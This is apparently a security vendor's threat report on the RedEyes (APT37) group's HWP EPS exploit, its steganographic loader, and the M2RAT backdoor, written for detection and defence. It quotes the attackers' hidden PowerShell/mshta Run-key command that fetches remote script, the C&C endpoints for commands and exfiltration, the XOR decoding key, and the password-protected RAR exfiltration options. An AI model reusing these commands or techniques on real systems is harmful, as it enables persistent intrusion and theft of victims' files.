In January, the ASEC (AhnLab Security Emergency response Center) analysis team discovered that the RedEyes threat group (also known as APT37, ScarCruft) had been distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291). This report will share the RedEyes group’s latest activity in Korea.
The RedEyes group is known for targeting specific individuals and not corporations, stealing not only personal PC information but also the mobile phone data of their targets. A distinct characteristic of the latest RedEyes group attack is the fact that they exploited the HWP EPS vulnerability using the steganography technique to distribute their malware.
The HWP EPS vulnerability used in the attacks is an old vulnerability that has already been patched in the latest version of the Hangul Word Processor. We assume that the threat actor initiated their attacks after checking in advance if their targets (individuals) were using an older version of HWP that supports EPS. Furthermore, there is a confirmed past case where the RedEyes group used the steganography technique to distribute malware. In 2019, Kaspersky shared a report saying that the ScarCruft (RedEyes) group’s downloader used the steganography technique to download additional malware.
The usage of the steganography technique to download malware and the RUN key command for autorun registration to establish a consistent connection with the C&C server being similar to the format used by the RedEye group in the past are the reasons why we believe they had done this attack.
The RedEyes group is also known for using Powershell and the Chinotto malware to steal PC information and remote control systems. However, a new malware strain was found in the latest attack which, unlike Chinotto, uses the shared memory section to carry out C&C commands.
Regarding the newly identified malware, the ASEC analysis team named it M2RAT (Map2RAT) after the name found in the shared memory section.
This report covers the TTPs (Tactics, Techniques, and Procedures) of the RedEyes group’s initial access, defense evasion, persistence, and the newly identified M2RAT’s latest command control and exfiltration.
2.1. Initial Access
On January 13, an HWP EPS vulnerability (CVE-2017-8291) attack involving the usage of the filename “Form.hwp” was discovered by AhnLab’s ASD (AhnLab Smart Defense). The HWP document was not collected at the time of the analysis, but we were able to procure the EPS file that triggered the aforementioned vulnerability.
EPS is a type of graphic format that uses the PostScript programming language by Adobe to show graphics. High-resolution vector images can be shown through EPS and the Hangul Word Processor supported a third-party module (ghostscript) to process EPS files. However, due to an increase in malicious EPS vulnerability exploitations, such as APT attacks, Hancom has removed the third-party EPS processing module.
Additionally, the ASEC analysis team posted a detailed analysis report on the CVE-2017-8291 vulnerability back in 2019.
The “Form.hwp” file includes a vulnerable EPS file (CVE-2017-8291) which is shown in Figure 4. When the user opens the file (“Form.hwp”), the vulnerability allows the threat actor’s shellcode to run through the third-party module.
The shellcode downloads an image file (JPEG) from the threat actor’s server (C&C) and decrypts the encoded PE file contained within the image file. Afterward, it creates the PE file in the %temp% path before executing it.
2.2. Defense Evasion
The shellcode downloaded an image file from the threat actor’s server and executed an additional piece of malware. In other words, the threat actor used the steganography technique to embed a malware strain within an image. We assume that this was done to evade network detection. It appears that the steganography image file used by the threat actor was obtained from a wallpaper-sharing website called “wallup.net”.
The image file consists of a normal JPEG header, the meta data required for decoding the PE file (XOR key and file size), and the encoded PE file.
A 16-byte XOR key is used for PE decoding to XOR 1 byte at a time.
- 16-byte xor key : FD DD 28 F5 7C 48 8E 7E 0C E0 17 77 35 87 3B 49
(0xFD xor 0xB0) = 0x4D (M)
(0xDD xor 0x87) = 0x5A (Z)
(0x28 xor 0xB8) = 0x90
(0xF5 xor 0xF5) = 0x00
(* MZ is the signature of the PE file.)
The ultimately decoded PE file is created and executed under the name lskdjfel.exe in the %temp% path. The executed PE file is responsible for downloading an additional backdoor malware (M2RAT), injecting it into explorer.exe, and adding both Powershell and mshta commands to the autorun registry Run key to establish a persistent connection with the threat actor’s server.
The executed lskdjfel.exe file registers the following command to the registry Run key to establish a persistent connection with the threat actor’s server.
- Registry key path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Value name: RyPO
- Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 340328 220.127.116.11 || mshta hxxps://www.*****elearning.or[.]kr/popup/handle/1.html
The command registered to the registry Run key was found to be similar to that of the ScarCruft (RedEyes) group report published by Kaspersky in 2021.
[ScarCruft’s registry Run key command in 2021 (by Kaspersky)]
- c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 300000 18.104.22.168 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html
[RedEyes (ScarCruft) registry Run key command in 2023]
- c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 340328 22.214.171.124 || mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html
The JS code is responsible for executing the Powershell command, which receives and executes commands from the threat actor’s server, and returns the results.
When the Powershell adds a “U” parameter to the threat actor’s server address when transmitting the computer name and username, the threat actor’s server encodes the CMD command that is going to be executed in BASE64 before sending it to the affected host. The encoded BASE64 command is then decoded by Powershell and executed. The result of the command is saved as a file in the %temp%\vnGhazwFiPgQ path. Afterward, an “R” parameter is added to the threat actor’s server which then encodes the command execution result in BASE64 before sending it.
- hxxps://www.*******elearning.or[.]kr/popup/handle/log.php?U=[Computer Name]+[Username] // Receive the threat actor’s command
- hxxps://www.*******elearning.or[.]kr/popup/handle/log.php?R=[BASE64-encoded] // Send command execution result
2.4. M2RAT (Map2RAT)
The ultimately executed backdoor operates after being injected into explorer.exe. The main features of this backdoor are similar to those of basic remote control malware, which include keylogging, data leakage (files and recordings), running or terminating processes, and capturing screenshots.
However, the recently discovered backdoor has a different command system compared to the previously identified Chinotto malware. It does not save the keylogging data or screenshot logs in the affected system but instead sends them to the threat actor’s server, leaving no traces of the stolen data in the affected system.
The ASEC analysis team named this newly identified malware M2RAT (Map2RAT) after the common name within the shared memory section used during C&C communication.
2.4.1. Command and Control of M2RAT
M2RAT’s C&C communications command system involves receiving commands from the threat actor’s server through the POST method’s Body. The meaning of these command can be found in the below Table 1.
|OKR||Command received upon initial connection with C&C communications|
|URL||Edits the registry key value to update the C&C|
|UPD||Updates the currently connected C&C|
|RES||Ends C&C connection (End M2RAT)|
|UNI||Ends C&C connection (End M2RAT)|
|CMD||Performs remote control commands (Keylogging and process creation/execution)|
M2RAT’s threat actor server manages hosts with MAC addresses in order to distinguish affected hosts. When infected with M2RAT, the MAC address is encoded (XOR) with 0x5c and saved in the “HKCU\Software\OneDriver” path’s “Version” value. The encoded MAC address value is used to distinguish affected hosts in the threat actor’s server.
- Registry key path: HKCU\Software\OneDriver
- Value name: Version
- Value: Value that XOR-encoded (0x5c) MAC address of the affected host
The result value of the command sent by the threat actor to the affected host is saved in the “_Encoded MAC Address Value_2” folder of the threat actor’s server. The screenshots taken by M2RAT from the affected host are saved in the “_Encoded MAC Address Value_cap” folder. (Refer to Figure 12)
Additionally, M2RAT XOR encodes with 0x5c and saves the threat actor’s server address info in the “Property” value of the same registry key path as the MAC address.
- Registry key path: HKCU\Software\OneDriver
- Value name: Property
- Value: Value that XOR-encoded (0x5c) threat actor’s server address
In the future, the threat actor can transmit the “URL” and “UPD” commands to M2RAT to update their server address (Refer to Table 1). The “URL” command is used to update the registry key with a new address and the “UPD” command is used to change the threat actor’s address defined in the currently running instance of M2RAT.
The remote control command of M2RAT is established by transmitting CMD commands from the threat actor’s server. The Chinotto malware, which was confirmed to have been used by the RedEyes group in the past, executed remote control commands through the Query String method, but M2RAT creates a shared memory section to execute the commands from the threat actor’s server. Like the threat actor’s use of the steganography technique in the initial breach stage, this appears to also be for the purpose of evading network detection by hiding the command info in the Body of the POST.
(* Query String: A string that starts with a question mark at the end of a URL)
The CMD command is transmitted through the shared memory. The memory section name info is shown below in Table 2.
|RegistryModuleInputMap2||Transmits additional module execution results (e.g. Mobile phone data leak module)|
|FileInputMap2||Explores drives (A:\ – Z:\), create/write files, and changes file time|
|CaptureInputMap2||Screenshots the current screen of the affected host’s PC|
|ProcessInputMap2||Checks the process list, create/terminate processes|
|RawInputMap2||Use ShellExectueExW API to run process|
|TypingRecordInputMap2||Leaks keylogging data|
|UsbCheckingInputMap2||USB data leak|
(hwp, doc, docx, xls, xlsx, ppt, pptx, cell, csv, show, hsdt, mp3, amr, 3gp, m4a, txt, png, jpg, jpeg, gif, pdf, eml)
M2RAT’s exfiltration features include screenshots of the affected host’s screen, process information, keylogging information, and data (documents and voice files) leaks. In the case of screenshots, they are taken regularly even if a command is not given by the threat actor. They are then sent to the threat actor’s server where they are saved as “result_[number]” in the “_Encoded MAC Address Value_cap” folder.
The remaining data leaks are saved in the “_Encoded MAC Address Value_2” folder.
If there are documents or voice recordings with sensitive data in removable storage devices or shared folders, then these are copied into the %TEMP% path, compressed into a password-protected file with Winrar (RAR.exe), and the results are then transmitted to the threat actor’s server.
- Folder path where data is copied to: %Temp%\Y_%m_%d_%H_%M_%S // (e.g. %TEMP%\Year_Month_Date _Hour_Minute_Second)
- File extensions: hwp, doc, docx, xls, xlsx, ppt, pptx, cell, csv, show, hsdt, mp3, amr, 3gp, m4a, txt, png, jpg, jpeg, gif, pdf, eml
The RAR.exe options that are used are as follows. The path the compressed file is created into is the same as the %TEMP% folder path.
- a -df -r -hp dgefiue389d@39r#1Ud -m1 “Compressed file creation path” “Compression target path”
|df||Delete file after compression|
|r||Recover compressed file|
|hp||Encrypt file data and header|
|m||Set compression level|
The ASEC analysis team was also able to uncover through the ASD (AhnLab Smart Defense) infrastructure an Infostealer communicating with M2RAT. This malware was identified as a .NET file that steals files saved on mobile phones and sends them to the RegistryModuleResultMap2 shared memory section of M2RAT.
The .NET file’s PDB info is as follows.
- PDB : E:\MyWork\PhoneDataCp\PhoneDeviceManager\PhoneDeviceManager\obj\x86\Release\PhoneDeviceManager.pdb
The RedEyes group is an APT hacking organization that is supported on a national level. They are known to attack individual targets such as human rights activists, reporters, and North Korean defects. Their aim appears to be exfilitration. Defending against such APT attacks is an extremely complicated process. Especially since the RedEyes group is known to target individuals instead of corporations. It is difficult for individuals to even realize they have been affected. The ASEC analysis team is closely tracking this group. Should a new TTPs be found from this threat actor, we will quickly share the details as we did in this blog post to contribute towards minimizing damage.
[MD5 (Detection name, engine version)]
8b666fc04af6de45c804d973583c76e0 // EPS file – Exploit/EPS.Generic (2023.01.16.03)
93c66ee424daf4c5590e21182592672e // Steganography JPEG – Data/BIN.Agent (2023.02.15.00)
7bab405fbc6af65680443ae95c30595d // PE file(JPEG) Stage PE file – Trojan/Win.Loader.C5359534 (2023.01.16.03)
9083c1ff01ad8fabbcd8af1b63b77e66 // Powershell script – Downloader/PS.Generic.SC185661 (2023.01.16.03)
4488c709970833b5043c0b0ea2ec9fa9 // M2RAT – Trojan/Win.M2RAT.C5357519 (2023.01.14.01)
7f5a72be826ea2fe5f11a16da0178e54 // Mobile phone data theft – Infostealer/Win.Phone.C5381667 (2023.02.14.03)
- scarcruft-surveilling-north-korean-defectors-and-human-rights-activists – Kaspersky
- TTPs #9: Analysis of Attack Strategies that Monitor Daily Lives of Individuals -KrCert/CC
- TTPs $ ScarCruft Tracking Note – KrCert/CC
- “Ghost” Hidden In HWP Files (This report supports Korean only for now.) – ASEC Analysis Team